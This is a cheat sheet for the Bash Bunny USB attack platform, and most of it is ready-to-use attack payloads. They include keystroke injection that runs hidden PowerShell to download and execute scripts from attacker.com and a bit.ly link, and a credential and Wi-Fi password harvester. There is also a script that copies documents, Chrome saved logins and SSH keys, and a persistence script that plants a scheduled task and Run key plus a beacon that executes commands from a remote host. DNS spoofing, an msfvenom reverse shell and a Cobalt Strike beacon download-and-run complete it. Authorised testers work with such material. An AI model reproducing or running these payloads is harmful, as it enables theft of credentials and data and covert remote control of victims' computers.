Appearance
Bash Bunny Cheat Sheet
Overview
The Bash Bunny is a multi-vector USB attack and automation platform developed by Hak5. This advanced physical penetration testing tool combines the functionality of multiple attack vectors into a single USB device, making it an essential tool for security professionals conducting physical security assessments. The Bash Bunny can emulate various USB device types including keyboards, network adapters, serial devices, and mass storage, allowing for sophisticated attack scenarios that can bypass traditional security controls and provide comprehensive testing of an organization's physical security posture.
⚠️ Warning: The Bash Bunny is a powerful penetration testing tool that should only be used against systems you own or have explicit written permission to test. Unauthorized use may violate local laws and organizational policies. Always ensure proper authorization before conducting physical security assessments.
Hardware Overview
Device Specifications
bash
# Bash Bunny Mark II Specifications
CPU: Quad-core ARM Cortex-A7 @ 900MHz
RAM: 512MB DDR3
Storage: 8GB eMMC + MicroSD slot
USB: USB 3.0 Type-A connector
Network: Gigabit Ethernet adapter
Wireless: 802.11 b/g/n WiFi
Operating System: Custom Linux distribution
Power: Bus-powered via USB
Dimensions: 3.5" x 0.75" x 0.5"
Weight: 1.2 oz (34g)
# LED Status Indicators
Blue: Setup mode / Ready
Red: Attack mode / Executing payload
Green: Finished / Success
Yellow: Special function / Warning
Purple: Recovery modeSwitch Positions
bash
# Physical switch positions
Position 0: Arming mode (payload development)
Position 1: Attack payload 1
Position 2: Attack payload 2
# Switch position detection in payloads
SWITCH_POSITION=$(cat /sys/class/gpio/gpio*/value)
if [ "$SWITCH_POSITION" = "1" ]; then
# Execute payload 1
elif [ "$SWITCH_POSITION" = "2" ]; then
# Execute payload 2
fiInitial Setup and Configuration
First Time Setup
bash
# 1. Connect Bash Bunny to computer
# 2. Set switch to position 0 (arming mode)
# 3. Wait for blue LED (setup mode)
# 4. Access via SSH or serial console
# Default SSH credentials
ssh root@172.16.64.1
# Password: hak5bunny
# Default serial console (if SSH unavailable)
# Use terminal emulator: 115200 baud, 8N1
screen /dev/ttyACM0 115200Network Configuration
bash
# Configure WiFi (if available on Mark II)
wifi_connect() {
WIFI_SSID="YourNetwork"
WIFI_PASS="YourPassword"
# Configure WiFi
cat > /etc/wpa_supplicant/wpa_supplicant.conf << EOF
network={
ssid="$WIFI_SSID"
psk="$WIFI_PASS"
}
EOF
# Start WiFi
wpa_supplicant -B -i wlan0 -c /etc/wpa_supplicant/wpa_supplicant.conf
dhclient wlan0
}
# Configure Ethernet bridge
configure_ethernet() {
# Enable IP forwarding
echo 1 > /proc/sys/net/ipv4/ip_forward
# Configure bridge interface
brctl addbr br0
brctl addif br0 eth0
brctl addif br0 usb0
ifconfig br0 up
# Start DHCP server
dnsmasq --interface=br0 --dhcp-range=172.16.64.10,172.16.64.100,12h
}
# Update system
update_system() {
# Update package lists
apt update
# Upgrade system
apt upgrade -y
# Install additional tools
apt install -y nmap netcat-openbsd curl wget git
}Payload Directory Structure
bash
# Bash Bunny payload structure
/root/udisk/payloads/
├── switch1/ # Payloads for switch position 1
│ ├── payload.txt # Main payload script
│ ├── config.txt # Configuration file
│ └── resources/ # Additional resources
├── switch2/ # Payloads for switch position 2
│ ├── payload.txt
│ ├── config.txt
│ └── resources/
└── library/ # Payload library
├── credentials/
├── exfiltration/
├── execution/
├── recon/
└── persistence/
# Create payload directory
create_payload() {
local switch_pos="$1"
local payload_name="$2"
mkdir -p "/root/udisk/payloads/switch${switch_pos}"
cd "/root/udisk/payloads/switch${switch_pos}"
# Create basic payload template
cat > payload.txt << 'EOF'
#!/bin/bash
#
# Title: Custom Payload
# Description: Description of payload functionality
# Author: Your Name
# Version: 1.0
# Category: Category
#
# LED setup
LED SETUP
# Attack mode configuration
ATTACKMODE HID STORAGE
# Main payload logic
RUN WIN "cmd /c echo Hello World"
# LED finish
LED FINISH
EOF
echo "Payload created: /root/udisk/payloads/switch${switch_pos}/payload.txt"
}Attack Modes and USB Emulation
HID (Human Interface Device) Mode
bash
# Keyboard emulation
ATTACKMODE HID
# Basic keystroke injection
RUN WIN "cmd"
DELAY 500
STRING "echo Hello from Bash Bunny"
ENTER
# Advanced keystroke sequences
RUN WIN "r"
DELAY 500
STRING "powershell -WindowStyle Hidden -ExecutionPolicy Bypass"
ENTER
DELAY 1000
STRING "IEX (New-Object Net.WebClient).DownloadString('http://attacker.com/payload.ps1')"
ENTER
# Special key combinations
CTRL ALT DELETE
ALT F4
CTRL SHIFT ESC
WIN BREAKStorage Mode
bash
# Mass storage emulation
ATTACKMODE STORAGE
# Configure storage image
STORAGE_IMAGE="/root/udisk/images/payload.img"
# Create storage image
create_storage_image() {
local image_size="100M"
local image_file="/root/udisk/images/custom.img"
# Create image file
dd if=/dev/zero of="$image_file" bs=1M count=100
# Format as FAT32
mkfs.vfat "$image_file"
# Mount and populate
mkdir -p /mnt/storage
mount -o loop "$image_file" /mnt/storage
# Add payload files
cp /root/payloads/* /mnt/storage/
# Unmount
umount /mnt/storage
echo "Storage image created: $image_file"
}
# Autorun configuration
create_autorun() {
cat > /mnt/storage/autorun.inf << 'EOF'
[autorun]
open=payload.exe
icon=icon.ico
label=USB Drive
EOF
}Ethernet Mode
bash
# Network adapter emulation
ATTACKMODE ETHERNET
# Configure network settings
configure_ethernet_attack() {
# Set IP configuration
ifconfig usb0 192.168.1.1 netmask 255.255.255.0
# Start DHCP server
dnsmasq --interface=usb0 --dhcp-range=192.168.1.10,192.168.1.100,12h
# Enable IP forwarding
echo 1 > /proc/sys/net/ipv4/ip_forward
# Configure iptables for NAT
iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
iptables -A FORWARD -i usb0 -o eth0 -j ACCEPT
iptables -A FORWARD -i eth0 -o usb0 -m state --state RELATED,ESTABLISHED -j ACCEPT
}
# DNS spoofing
dns_spoof() {
# Configure dnsmasq for DNS spoofing
cat > /etc/dnsmasq.conf << 'EOF'
interface=usb0
dhcp-range=192.168.1.10,192.168.1.100,12h
address=/evil.com/192.168.1.1
address=/login.company.com/192.168.1.1
EOF
# Start dnsmasq
dnsmasq -C /etc/dnsmasq.conf
}Serial Mode
bash
# Serial device emulation
ATTACKMODE SERIAL
# Configure serial parameters
configure_serial() {
# Set baud rate and parameters
stty -F /dev/ttyGS0 115200 cs8 -cstopb -parenb
# Start serial communication
cat /dev/ttyGS0 &
echo "Serial mode configured"
}
# Serial data capture
capture_serial() {
local output_file="/root/loot/serial_capture.txt"
# Capture serial data
cat /dev/ttyGS0 | tee "$output_file" &
echo "Serial capture started: $output_file"
}Composite Modes
bash
# Multiple attack modes simultaneously
ATTACKMODE HID STORAGE
ATTACKMODE HID ETHERNET
ATTACKMODE STORAGE ETHERNET
ATTACKMODE HID STORAGE ETHERNET
# Example: HID + Storage attack
composite_attack() {
# Configure composite mode
ATTACKMODE HID STORAGE
# HID component: Open file explorer
RUN WIN "explorer"
DELAY 1000
# Storage component: Auto-execute payload
# Files on storage device will be accessible
# HID component: Navigate to storage
STRING "E:\\"
ENTER
DELAY 500
STRING "payload.exe"
ENTER
}Payload Development
Basic Payload Structure
bash
#!/bin/bash
#
# Title: Basic Payload Template
# Description: Template for Bash Bunny payloads
# Author: Security Researcher
# Version: 1.0
# Category: Template
#
# Include Bash Bunny library
source /usr/lib/bashbunny/bunny_helpers.sh
# LED status: Setup
LED SETUP
# Configure attack mode
ATTACKMODE HID
# Wait for target to recognize device
DELAY 2000
# Main payload execution
main_payload() {
# Open command prompt
RUN WIN "cmd"
DELAY 500
# Execute commands
STRING "echo Payload executed successfully"
ENTER
# Additional payload logic here
# Clean up
STRING "exit"
ENTER
}
# Execute main payload
main_payload
# LED status: Finished
LED FINISH
# Sync and exit
syncAdvanced Payload Techniques
Credential Harvesting
bash
#!/bin/bash
#
# Title: Credential Harvester
# Description: Harvests stored credentials from target system
# Author: Security Researcher
# Version: 1.0
# Category: Credentials
#
source /usr/lib/bashbunny/bunny_helpers.sh
LED SETUP
ATTACKMODE HID STORAGE
# Wait for target recognition
DELAY 3000
harvest_credentials() {
# Open PowerShell as administrator
RUN WIN "powershell -WindowStyle Hidden -ExecutionPolicy Bypass"
DELAY 1000
# Create credential harvesting script
STRING "Set-Location \$env:TEMP"
ENTER
DELAY 500
# Download and execute credential harvester
STRING "IEX (New-Object Net.WebClient).DownloadString('http://bit.ly/cred-harvest')"
ENTER
DELAY 2000
# Alternative: Use built-in Windows tools
STRING "cmdkey /list > credentials.txt"
ENTER
DELAY 500
# Export WiFi passwords
STRING "netsh wlan show profiles | Select-String 'All User Profile' | ForEach-Object {\$_.ToString().Split(':')[1].Trim()} | ForEach-Object {netsh wlan show profile name=\$_ key=clear} > wifi_passwords.txt"
ENTER
DELAY 1000
# Copy to Bash Bunny storage
STRING "Copy-Item credentials.txt E:\\"
ENTER
STRING "Copy-Item wifi_passwords.txt E:\\"
ENTER
# Clean up
STRING "Remove-Item credentials.txt, wifi_passwords.txt"
ENTER
STRING "exit"
ENTER
}
harvest_credentials
LED FINISH
syncNetwork Reconnaissance
bash
#!/bin/bash
#
# Title: Network Reconnaissance
# Description: Performs network discovery and reconnaissance
# Author: Security Researcher
# Version: 1.0
# Category: Reconnaissance
#
source /usr/lib/bashbunny/bunny_helpers.sh
LED SETUP
ATTACKMODE ETHERNET
# Configure network
configure_network() {
ifconfig usb0 192.168.1.1 netmask 255.255.255.0
dnsmasq --interface=usb0 --dhcp-range=192.168.1.10,192.168.1.100,12h &
echo 1 > /proc/sys/net/ipv4/ip_forward
}
# Network reconnaissance
network_recon() {
local loot_dir="/root/loot/network_recon_$(date +%Y%m%d_%H%M%S)"
mkdir -p "$loot_dir"
# Wait for target to connect
sleep 10
# Get target IP
local target_ip=$(arp -a | grep usb0 | awk '{print $2}' | tr -d '()')
if [ -n "$target_ip" ]; then
echo "Target connected: $target_ip" > "$loot_dir/target_info.txt"
# Network discovery
nmap -sn 192.168.1.0/24 > "$loot_dir/network_discovery.txt" 2>&1
# Port scan target
nmap -sS -O "$target_ip" > "$loot_dir/target_portscan.txt" 2>&1
# ARP table
arp -a > "$loot_dir/arp_table.txt"
# Network configuration
ifconfig > "$loot_dir/network_config.txt"
# DNS queries
dig @8.8.8.8 company.com > "$loot_dir/dns_queries.txt" 2>&1
echo "Network reconnaissance completed: $loot_dir"
else
echo "No target connected" > "$loot_dir/error.txt"
fi
}
configure_network
network_recon
LED FINISH
syncData Exfiltration
bash
#!/bin/bash
#
# Title: Data Exfiltration
# Description: Exfiltrates sensitive data from target system
# Author: Security Researcher
# Version: 1.0
# Category: Exfiltration
#
source /usr/lib/bashbunny/bunny_helpers.sh
LED SETUP
ATTACKMODE HID STORAGE
DELAY 3000
exfiltrate_data() {
# Open PowerShell
RUN WIN "powershell -WindowStyle Hidden"
DELAY 1000
# Create exfiltration script
STRING "Set-Location \$env:TEMP"
ENTER
DELAY 500
# Search for sensitive files
STRING "\$files = Get-ChildItem -Path C:\\ -Recurse -Include *.txt,*.doc,*.docx,*.pdf,*.xls,*.xlsx -ErrorAction SilentlyContinue | Where-Object {\$_.Length -lt 10MB}"
ENTER
DELAY 1000
# Create archive
STRING "Compress-Archive -Path \$files -DestinationPath sensitive_data.zip -Force"
ENTER
DELAY 5000
# Copy to Bash Bunny
STRING "Copy-Item sensitive_data.zip E:\\"
ENTER
DELAY 2000
# Search for browser data
STRING "\$chrome_path = \"\$env:LOCALAPPDATA\\Google\\Chrome\\User Data\\Default\""
ENTER
STRING "if (Test-Path \$chrome_path) { Copy-Item \"\$chrome_path\\Login Data\" E:\\chrome_logins.db -Force }"
ENTER
DELAY 1000
# Search for SSH keys
STRING "\$ssh_path = \"\$env:USERPROFILE\\.ssh\""
ENTER
STRING "if (Test-Path \$ssh_path) { Copy-Item \$ssh_path E:\\ssh_keys -Recurse -Force }"
ENTER
DELAY 1000
# Clean up
STRING "Remove-Item sensitive_data.zip -Force"
ENTER
STRING "exit"
ENTER
}
exfiltrate_data
LED FINISH
syncPersistence Mechanism
bash
#!/bin/bash
#
# Title: Persistence Mechanism
# Description: Establishes persistence on target system
# Author: Security Researcher
# Version: 1.0
# Category: Persistence
#
source /usr/lib/bashbunny/bunny_helpers.sh
LED SETUP
ATTACKMODE HID STORAGE
DELAY 3000
establish_persistence() {
# Open PowerShell as administrator
RUN WIN "powershell -WindowStyle Hidden -ExecutionPolicy Bypass"
DELAY 1000
# Create persistence script
STRING "Set-Location \$env:TEMP"
ENTER
DELAY 500
# Download payload from Bash Bunny
STRING "Copy-Item E:\\persistence.ps1 .\\"
ENTER
DELAY 1000
# Create scheduled task for persistence
STRING "\$action = New-ScheduledTaskAction -Execute 'powershell.exe' -Argument '-WindowStyle Hidden -ExecutionPolicy Bypass -File C:\\Windows\\Temp\\persistence.ps1'"
ENTER
DELAY 500
STRING "\$trigger = New-ScheduledTaskTrigger -AtLogOn"
ENTER
DELAY 500
STRING "\$settings = New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries -Hidden"
ENTER
DELAY 500
STRING "Register-ScheduledTask -TaskName 'SystemUpdate' -Action \$action -Trigger \$trigger -Settings \$settings -Force"
ENTER
DELAY 1000
# Registry persistence
STRING "New-ItemProperty -Path 'HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run' -Name 'SystemUpdate' -Value 'powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File C:\\Windows\\Temp\\persistence.ps1' -Force"
ENTER
DELAY 500
# Copy persistence script to system
STRING "Copy-Item persistence.ps1 C:\\Windows\\Temp\\ -Force"
ENTER
DELAY 500
# Set hidden attribute
STRING "Set-ItemProperty -Path C:\\Windows\\Temp\\persistence.ps1 -Name Attributes -Value Hidden"
ENTER
DELAY 500
# Clean up
STRING "Remove-Item persistence.ps1 -Force"
ENTER
STRING "exit"
ENTER
}
# Create persistence payload file
create_persistence_payload() {
cat > /root/udisk/payloads/switch1/persistence.ps1 << 'EOF'
# Persistence payload
while ($true) {
try {
# Beacon home
$response = Invoke-WebRequest -Uri "http://attacker.com/beacon" -Method POST -Body "alive" -UseBasicParsing
# Execute commands if available
if ($response.Content -ne "ok") {
Invoke-Expression $response.Content
}
} catch {
# Silent failure
}
# Sleep for 1 hour
Start-Sleep 3600
}
EOF
}
create_persistence_payload
establish_persistence
LED FINISH
syncAutomation Scripts
Payload Management System
bash
#!/bin/bash
# Bash Bunny payload management system
PAYLOAD_DIR="/root/udisk/payloads"
LIBRARY_DIR="/root/udisk/payloads/library"
LOOT_DIR="/root/loot"
# Function to list available payloads
list_payloads() {
echo "[+] Available payloads:"
echo ""
echo "Switch Position 1:"
if [ -f "$PAYLOAD_DIR/switch1/payload.txt" ]; then
local title=$(grep "^# Title:" "$PAYLOAD_DIR/switch1/payload.txt" | cut -d: -f2 | xargs)
local desc=$(grep "^# Description:" "$PAYLOAD_DIR/switch1/payload.txt" | cut -d: -f2 | xargs)
echo " Title: $title"
echo " Description: $desc"
else
echo " No payload configured"
fi
echo ""
echo "Switch Position 2:"
if [ -f "$PAYLOAD_DIR/switch2/payload.txt" ]; then
local title=$(grep "^# Title:" "$PAYLOAD_DIR/switch2/payload.txt" | cut -d: -f2 | xargs)
local desc=$(grep "^# Description:" "$PAYLOAD_DIR/switch2/payload.txt" | cut -d: -f2 | xargs)
echo " Title: $title"
echo " Description: $desc"
else
echo " No payload configured"
fi
echo ""
echo "Library payloads:"
find "$LIBRARY_DIR" -name "*.txt" -type f | while read -r payload; do
local title=$(grep "^# Title:" "$payload" | cut -d: -f2 | xargs)
local category=$(grep "^# Category:" "$payload" | cut -d: -f2 | xargs)
echo " $(basename "$payload" .txt): $title ($category)"
done
}
# Function to install payload
install_payload() {
local payload_name="$1"
local switch_position="$2"
if [ -z "$payload_name" ] || [ -z "$switch_position" ]; then
echo "Usage: install_payload <payload_name> <switch_position>"
echo "Example: install_payload credential_harvester 1"
return 1
fi
local source_file="$LIBRARY_DIR/$payload_name.txt"
local dest_dir="$PAYLOAD_DIR/switch$switch_position"
local dest_file="$dest_dir/payload.txt"
if [ ! -f "$source_file" ]; then
echo "[-] Payload not found: $payload_name"
return 1
fi
mkdir -p "$dest_dir"
cp "$source_file" "$dest_file"
echo "[+] Payload installed: $payload_name -> switch position $switch_position"
# Copy any additional resources
local resource_dir="$LIBRARY_DIR/$(dirname "$payload_name")/resources"
if [ -d "$resource_dir" ]; then
cp -r "$resource_dir" "$dest_dir/"
echo "[+] Resources copied"
fi
}
# Function to create new payload
create_payload() {
local payload_name="$1"
local category="$2"
if [ -z "$payload_name" ] || [ -z "$category" ]; then
echo "Usage: create_payload <payload_name> <category>"
echo "Categories: credentials, exfiltration, execution, recon, persistence"
return 1
fi
local category_dir="$LIBRARY_DIR/$category"
local payload_file="$category_dir/$payload_name.txt"
mkdir -p "$category_dir"
cat > "$payload_file" << EOF
#!/bin/bash
#
# Title: $payload_name
# Description: Description of payload functionality
# Author: $(whoami)
# Version: 1.0
# Category: $category
# Created: $(date)
#
source /usr/lib/bashbunny/bunny_helpers.sh
LED SETUP
# Configure attack mode
ATTACKMODE HID
# Wait for target recognition
DELAY 2000
# Main payload logic
main_payload() {
# Add your payload logic here
RUN WIN "cmd"
DELAY 500
STRING "echo Hello from $payload_name"
ENTER
DELAY 1000
STRING "exit"
ENTER
}
# Execute payload
main_payload
LED FINISH
sync
EOF
echo "[+] Payload template created: $payload_file"
echo "[+] Edit the file to implement your payload logic"
}
# Function to backup payloads
backup_payloads() {
local backup_dir="/root/payload_backups"
local backup_file="$backup_dir/payloads_backup_$(date +%Y%m%d_%H%M%S).tar.gz"
mkdir -p "$backup_dir"
tar -czf "$backup_file" -C /root/udisk payloads/
echo "[+] Payloads backed up: $backup_file"
}
# Function to restore payloads
restore_payloads() {
local backup_file="$1"
if [ -z "$backup_file" ] || [ ! -f "$backup_file" ]; then
echo "Usage: restore_payloads <backup_file>"
echo "Available backups:"
ls -la /root/payload_backups/*.tar.gz 2>/dev/null || echo "No backups found"
return 1
fi
echo "[+] Restoring payloads from: $backup_file"
tar -xzf "$backup_file" -C /root/udisk/
echo "[+] Payloads restored successfully"
}
# Function to test payload syntax
test_payload() {
local switch_position="$1"
if [ -z "$switch_position" ]; then
echo "Usage: test_payload <switch_position>"
return 1
fi
local payload_file="$PAYLOAD_DIR/switch$switch_position/payload.txt"
if [ ! -f "$payload_file" ]; then
echo "[-] No payload found for switch position $switch_position"
return 1
fi
echo "[+] Testing payload syntax: $payload_file"
# Check bash syntax
bash -n "$payload_file"
if [ $? -eq 0 ]; then
echo "[+] Payload syntax is valid"
else
echo "[-] Payload syntax errors found"
return 1
fi
# Check for required functions
if ! grep -q "LED SETUP" "$payload_file"; then
echo "[!] Warning: LED SETUP not found"
fi
if ! grep -q "LED FINISH" "$payload_file"; then
echo "[!] Warning: LED FINISH not found"
fi
if ! grep -q "ATTACKMODE" "$payload_file"; then
echo "[!] Warning: ATTACKMODE not specified"
fi
}
# Function to monitor loot
monitor_loot() {
echo "[+] Monitoring loot directory: $LOOT_DIR"
# Create loot directory if it doesn't exist
mkdir -p "$LOOT_DIR"
# Monitor for new files
inotifywait -m -r -e create,modify "$LOOT_DIR" --format '%w%f %e %T' --timefmt '%Y-%m-%d %H:%M:%S' | while read file event time; do
echo "[$time] $event: $file"
# Automatically compress large files
if [ "$event" = "CREATE" ] && [ -f "$file" ]; then
local file_size=$(stat -c%s "$file")
if [ "$file_size" -gt 10485760 ]; then # 10MB
echo " [+] Compressing large file: $file"
gzip "$file"
fi
fi
done
}
# Main menu
show_menu() {
echo "Bash Bunny Payload Management System"
echo "===================================="
echo "1. List payloads"
echo "2. Install payload"
echo "3. Create new payload"
echo "4. Test payload"
echo "5. Backup payloads"
echo "6. Restore payloads"
echo "7. Monitor loot"
echo "8. Exit"
echo ""
read -p "Select option: " choice
case $choice in
1) list_payloads ;;
2)
read -p "Payload name: " name
read -p "Switch position (1 or 2): " pos
install_payload "$name" "$pos"
;;
3)
read -p "Payload name: " name
read -p "Category: " cat
create_payload "$name" "$cat"
;;
4)
read -p "Switch position (1 or 2): " pos
test_payload "$pos"
;;
5) backup_payloads ;;
6)
read -p "Backup file path: " backup
restore_payloads "$backup"
;;
7) monitor_loot ;;
8) exit 0 ;;
*) echo "Invalid option" ;;
esac
}
# Command line interface
if [ $# -eq 0 ]; then
while true; do
show_menu
echo ""
done
else
case "$1" in
"list") list_payloads ;;
"install") install_payload "$2" "$3" ;;
"create") create_payload "$2" "$3" ;;
"test") test_payload "$2" ;;
"backup") backup_payloads ;;
"restore") restore_payloads "$2" ;;
"monitor") monitor_loot ;;
*)
echo "Usage: $0 [command] [args]"
echo "Commands: list, install, create, test, backup, restore, monitor"
;;
esac
fiAutomated Payload Deployment
bash
#!/bin/bash
# Automated payload deployment and execution
DEPLOYMENT_CONFIG="deployment.conf"
LOG_FILE="/root/logs/deployment.log"
RESULTS_DIR="/root/results"
mkdir -p "$(dirname "$LOG_FILE")" "$RESULTS_DIR"
# Function to log messages
log_message() {
local message="$1"
echo "$(date '+%Y-%m-%d %H:%M:%S') - $message" | tee -a "$LOG_FILE"
}
# Function to deploy payload to switch position
deploy_payload() {
local payload_name="$1"
local switch_position="$2"
local target_description="$3"
log_message "Deploying payload: $payload_name to switch $switch_position"
log_message "Target: $target_description"
# Install payload
if install_payload "$payload_name" "$switch_position"; then
log_message "Payload deployed successfully"
# Create deployment record
cat > "$RESULTS_DIR/deployment_${switch_position}_$(date +%Y%m%d_%H%M%S).json" << EOF
{
"payload_name": "$payload_name",
"switch_position": "$switch_position",
"target_description": "$target_description",
"deployment_time": "$(date -Iseconds)",
"status": "deployed"
}
EOF
return 0
else
log_message "Payload deployment failed"
return 1
fi
}
# Function to execute payload
execute_payload() {
local switch_position="$1"
local execution_timeout="$2"
log_message "Executing payload on switch $switch_position"
# Check if payload exists
local payload_file="/root/udisk/payloads/switch$switch_position/payload.txt"
if [ ! -f "$payload_file" ]; then
log_message "No payload found for switch $switch_position"
return 1
fi
# Create execution environment
local execution_dir="/tmp/payload_execution_$$"
mkdir -p "$execution_dir"
cd "$execution_dir"
# Set timeout
if [ -n "$execution_timeout" ]; then
timeout "$execution_timeout" bash "$payload_file" 2>&1 | tee -a "$LOG_FILE"
local exit_code=$?
else
bash "$payload_file" 2>&1 | tee -a "$LOG_FILE"
local exit_code=$?
fi
# Clean up
cd /
rm -rf "$execution_dir"
if [ $exit_code -eq 0 ]; then
log_message "Payload execution completed successfully"
else
log_message "Payload execution failed with exit code: $exit_code"
fi
return $exit_code
}
# Function to collect results
collect_results() {
local switch_position="$1"
local collection_dir="$RESULTS_DIR/collection_$(date +%Y%m%d_%H%M%S)"
log_message "Collecting results from switch $switch_position"
mkdir -p "$collection_dir"
# Copy loot
if [ -d "/root/loot" ]; then
cp -r /root/loot/* "$collection_dir/" 2>/dev/null
log_message "Loot collected: $(find "$collection_dir" -type f | wc -l) files"
fi
# Copy storage contents
local storage_mount="/mnt/bunny_storage"
if mountpoint -q "$storage_mount"; then
cp -r "$storage_mount"/* "$collection_dir/" 2>/dev/null
log_message "Storage contents collected"
fi
# Generate collection report
cat > "$collection_dir/collection_report.txt" << EOF
Collection Report
================
Date: $(date)
Switch Position: $switch_position
Collection Directory: $collection_dir
Files Collected:
$(find "$collection_dir" -type f -exec ls -lh {} \; | awk '{print $9, $5}')
Total Size: $(du -sh "$collection_dir" | cut -f1)
EOF
log_message "Results collected in: $collection_dir"
}
# Function to generate deployment report
generate_report() {
local report_file="$RESULTS_DIR/deployment_report_$(date +%Y%m%d).html"
log_message "Generating deployment report: $report_file"
cat > "$report_file" << 'EOF'
<!DOCTYPE html>
<html>
<head>
<title>Bash Bunny Deployment Report</title>
<style>
body { font-family: Arial, sans-serif; margin: 20px; }
.header { background-color: #f0f0f0; padding: 20px; border-radius: 5px; }
.deployment { margin: 20px 0; padding: 15px; border: 1px solid #ddd; border-radius: 5px; }
.success { border-color: #4caf50; background-color: #e8f5e8; }
.failure { border-color: #f44336; background-color: #ffebee; }
table { border-collapse: collapse; width: 100%; }
th, td { border: 1px solid #ddd; padding: 8px; text-align: left; }
th { background-color: #f2f2f2; }
</style>
</head>
<body>
<div class="header">
<h1>Bash Bunny Deployment Report</h1>
<p>Generated: $(date)</p>
</div>
EOF
# Add deployment summaries
for deployment_file in "$RESULTS_DIR"/deployment_*.json; do
if [ -f "$deployment_file" ]; then
local payload_name=$(jq -r '.payload_name' "$deployment_file")
local switch_pos=$(jq -r '.switch_position' "$deployment_file")
local target=$(jq -r '.target_description' "$deployment_file")
local deploy_time=$(jq -r '.deployment_time' "$deployment_file")
cat >> "$report_file" << EOF
<div class="deployment success">
<h3>Deployment: $payload_name</h3>
<p><strong>Switch Position:</strong> $switch_pos</p>
<p><strong>Target:</strong> $target</p>
<p><strong>Deployment Time:</strong> $deploy_time</p>
</div>
EOF
fi
done
cat >> "$report_file" << 'EOF'
</body>
</html>
EOF
log_message "Deployment report generated: $report_file"
}
# Function to clean up old results
cleanup_results() {
local retention_days="$1"
if [ -z "$retention_days" ]; then
retention_days=30
fi
log_message "Cleaning up results older than $retention_days days"
# Clean up old deployment files
find "$RESULTS_DIR" -name "deployment_*.json" -mtime +$retention_days -delete
find "$RESULTS_DIR" -name "collection_*" -type d -mtime +$retention_days -exec rm -rf {} \;
# Clean up old logs
find "$(dirname "$LOG_FILE")" -name "*.log" -mtime +$retention_days -delete
log_message "Cleanup completed"
}
# Main deployment workflow
main_deployment() {
local config_file="$1"
if [ ! -f "$config_file" ]; then
log_message "Configuration file not found: $config_file"
return 1
fi
log_message "Starting automated deployment workflow"
# Read configuration
source "$config_file"
# Deploy payloads
for i in $(seq 1 2); do
local payload_var="PAYLOAD_SWITCH_$i"
local target_var="TARGET_SWITCH_$i"
local timeout_var="TIMEOUT_SWITCH_$i"
local payload_name="${!payload_var}"
local target_desc="${!target_var}"
local timeout="${!timeout_var}"
if [ -n "$payload_name" ]; then
if deploy_payload "$payload_name" "$i" "$target_desc"; then
# Wait for manual execution or auto-execute
if [ "$AUTO_EXECUTE" = "true" ]; then
sleep 5 # Allow time for deployment
execute_payload "$i" "$timeout"
collect_results "$i"
fi
fi
fi
done
# Generate report
generate_report
# Cleanup if configured
if [ "$AUTO_CLEANUP" = "true" ]; then
cleanup_results "$RETENTION_DAYS"
fi
log_message "Automated deployment workflow completed"
}
# Create default configuration
create_default_config() {
cat > "$DEPLOYMENT_CONFIG" << 'EOF'
# Bash Bunny Deployment Configuration
# Payload assignments
PAYLOAD_SWITCH_1="credential_harvester"
PAYLOAD_SWITCH_2="network_recon"
# Target descriptions
TARGET_SWITCH_1="Windows 10 workstation - Finance department"
TARGET_SWITCH_2="Ubuntu server - Development environment"
# Execution timeouts (seconds)
TIMEOUT_SWITCH_1=300
TIMEOUT_SWITCH_2=600
# Automation settings
AUTO_EXECUTE=false
AUTO_CLEANUP=true
RETENTION_DAYS=30
EOF
log_message "Default configuration created: $DEPLOYMENT_CONFIG"
}
# Command line interface
case "$1" in
"deploy")
deploy_payload "$2" "$3" "$4"
;;
"execute")
execute_payload "$2" "$3"
;;
"collect")
collect_results "$2"
;;
"report")
generate_report
;;
"cleanup")
cleanup_results "$2"
;;
"workflow")
main_deployment "$2"
;;
"config")
create_default_config
;;
*)
echo "Usage: $0 [command] [args]"
echo "Commands:"
echo " deploy <payload> <switch> <target> - Deploy payload"
echo " execute <switch> [timeout] - Execute payload"
echo " collect <switch> - Collect results"
echo " report - Generate report"
echo " cleanup [days] - Clean up old results"
echo " workflow [config] - Run full workflow"
echo " config - Create default config"
;;
esacIntegration with Other Tools
Metasploit Integration
bash
# Generate Metasploit payloads for Bash Bunny
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f exe > /root/udisk/payloads/switch1/payload.exe
# Bash Bunny payload to execute Metasploit payload
cat > /root/udisk/payloads/switch1/payload.txt << 'EOF'
ATTACKMODE HID STORAGE
DELAY 3000
RUN WIN "E:\\payload.exe"
EOFEmpire Integration
bash
# Generate Empire stager for Bash Bunny
# In Empire console:
# (Empire) > usestager windows/launcher_bat
# (Empire: stager/windows/launcher_bat) > set Listener http
# (Empire: stager/windows/launcher_bat) > generate
# Copy generated stager to Bash Bunny storage
cp empire_stager.bat /root/udisk/payloads/switch1/Cobalt Strike Integration
bash
# Generate Cobalt Strike beacon for Bash Bunny
# In Cobalt Strike:
# Attacks -> Packages -> Windows Executable (S)
# Save as beacon.exe
# Bash Bunny payload for Cobalt Strike
cat > /root/udisk/payloads/switch1/payload.txt << 'EOF'
ATTACKMODE HID STORAGE
DELAY 3000
RUN WIN "powershell -WindowStyle Hidden -ExecutionPolicy Bypass -Command \"& {(New-Object System.Net.WebClient).DownloadFile('http://192.168.1.100/beacon.exe', 'C:\\Windows\\Temp\\beacon.exe'); Start-Process 'C:\\Windows\\Temp\\beacon.exe'}\""
EOFTroubleshooting
Common Issues
Device Not Recognized
bash
# Check USB connection
lsusb | grep "Hak5"
# Reset USB subsystem
echo 0 > /sys/bus/usb/devices/usb1/authorized
echo 1 > /sys/bus/usb/devices/usb1/authorized
# Check dmesg for errors
dmesg | tail -20Payload Not Executing
bash
# Check payload syntax
bash -n /root/udisk/payloads/switch1/payload.txt
# Check file permissions
chmod +x /root/udisk/payloads/switch1/payload.txt
# Test payload manually
cd /root/udisk/payloads/switch1/
bash payload.txtLED Not Working
bash
# Check LED control
echo "LED SETUP" > /dev/ttyGS0
echo "LED FINISH" > /dev/ttyGS0
# Reset LED controller
systemctl restart led-controllerStorage Mode Issues
bash
# Check storage image
file /root/udisk/images/payload.img
# Mount storage image manually
mkdir -p /mnt/test
mount -o loop /root/udisk/images/payload.img /mnt/test
ls -la /mnt/test
umount /mnt/testPerformance Optimization
bash
# Optimize payload execution speed
# Use DELAY sparingly
# Combine multiple STRING commands
# Use RUN for single commands
# Monitor system resources
top
free -h
df -h
# Clean up temporary files
rm -rf /tmp/*
